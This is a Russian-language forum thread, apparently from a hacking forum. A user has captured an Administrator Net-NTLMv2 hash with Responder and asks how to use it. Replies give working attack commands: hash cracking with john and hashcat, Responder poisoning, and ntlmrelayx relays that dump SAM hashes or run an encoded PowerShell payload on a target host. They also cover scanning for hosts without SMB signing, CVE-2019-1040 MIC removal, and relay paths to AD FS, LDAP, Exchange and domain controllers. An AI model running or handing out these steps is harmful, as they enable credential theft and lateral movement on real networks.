pass the hash

[CCod]

Всем привет.Responder перехватил хэш
[HTTP] NTLMv2 Username : WIN-***\Administrator
[HTTP] NTLMv2 Username : WIN-***\Administrator
[HTTP] NTLMv2 Client : xxxxxxx
[HTTP] NTLMv2 Hash : Administrator::WIN-*******:b3edec54018e1e9b:955950BEA4C5B634E04B8681863147A5:0101000000000000C5BE639566DDD8018CDB5CE0F9355ED80000000002000800380049003800590001001E00570049004E002D004B004500520053005000560058
00370042004D0033000400140038004900380059002E004C004F00430041004C0003003400570049004E002D004B00450052005300500056005800370042004D0033002E0038004900380059002E004C004F00430041004C000500140038004900380059002E004C004F00430041004C000800300030
000000000000000000000000300000A24D26BD32D829F2AE2339290FC17D9BB0B2CCA5BBF5A9A1A7E1A4CB9533C7B10A001000000000000000000000000000000000000900160048005400540050002F006100740074006100630068000000000000000000

Могу ли я сделать pass the hash.Если да то как

 

[valeraleontev]

Это NetNTLM хеш. Нельзя его в pass the hash засовывать. NetNTLM ты можешь релеить, если нет смб сигнинга. Посмотри, чем NetNTLM отличается от обычного NTLM и где что используется.

 

[IIIIXX]

Для того чтобы провести атаку path-the-hash - тебе нужен NTLM хеш
То что словил ты - это Net-NTLMv2 хеш
NetNTLM можно использовать только для ретрансляции или брута.

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt

Для ретрансляции можно использовать респондер в паре с нтлмреле

Перед запуском респондера необходимо редактировать конфиг файл

sudo nano /etc/responder/Responder.conf
SMB = Off
HTTP = Off

# выбираем нужный интерфейс
ip a
ifconfig

responder -I eth1 -v

# dump sam hashes
ntlmrelayx.py -tf targetlist.txt -smb2support -i

# exec
ntlmrelayx.py -t 10.2.3.10 -c 'powershell -noP -sta -w 1 -enc encryptedPayload'

И как написали выше, реле ты можешь провести только если на целевой тачке не включена\не обязательна подпись смб

crackmapexec smb 10.2.3.10/24 --gen-relay-list targetlist.txt
nmap --script=smb2-security-mode.nse -iL ./targetlist.txt -p445

 

[valeraleontev]

Для ретрансляции можно использовать респондер в паре с нтлмреле

Респондер в данном случае используется лишь для LLMNR / NBNS спуфинга?

И как написали выше, реле ты можешь провести только если на целевой тачке не включена\не обязательна подпись смб

Или CVE-2019-1040
`--remove-mic` в ntlmrelayx

Уж простите за третье сообщение подряд, но можно и в AD FS релеить. Там как в HTTPS идёт. Не сработает лишь если EPA в required статусе
Либо пытаться задаунгрейдить, поставить челлендж 1122..88 и на crack.sh слить. Тоже гарантированный способ восстановления пароля

 

[IIIIXX]

Респондер в данном случае используется лишь для LLMNR / NBNS спуфинга?


Или CVE-2019-1040
`--remove-mic` в ntlmrelayx

Уж простите за третье сообщение подряд, но можно и в AD FS релеить. Там как в HTTPS идёт. Не сработает лишь если EPA в required статусе
Либо пытаться задаунгрейдить, поставить челлендж 1122..88 и на crack.sh слить. Тоже гарантированный способ восстановления пароля

Респондер упомянул так как автор именно им перехватил хеш, может через пойзонинг
Совершенно верно, можно релеить еще и на exchange (IMAP) и на ldap, так же множество атак с нтлм реле на дк такие как дфскорс, петитпотам и лса-спуфинг